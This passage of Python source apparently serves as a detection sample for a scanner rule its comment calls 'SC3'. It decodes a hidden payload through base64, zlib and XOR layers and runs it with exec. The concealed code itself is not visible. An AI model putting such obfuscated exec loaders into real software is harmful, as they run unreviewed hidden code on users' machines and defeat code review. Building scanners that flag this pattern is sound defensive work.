a+0Ei6SuTA2ySMAbhQv8CAEyU4elmatyWnnz8st3whPG4v0vvCYiR9YLngq/AdNK9MxAQA5wM1gbYZKvx5rHoxBHxf6Y5JnoCYmRxuntih/rdoe6kOLgZOXxDn97iX7UqjIP0+jz8x+q5qOX"
_K = bytes.fromhex("17fe625f26ecfda34c52d190")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
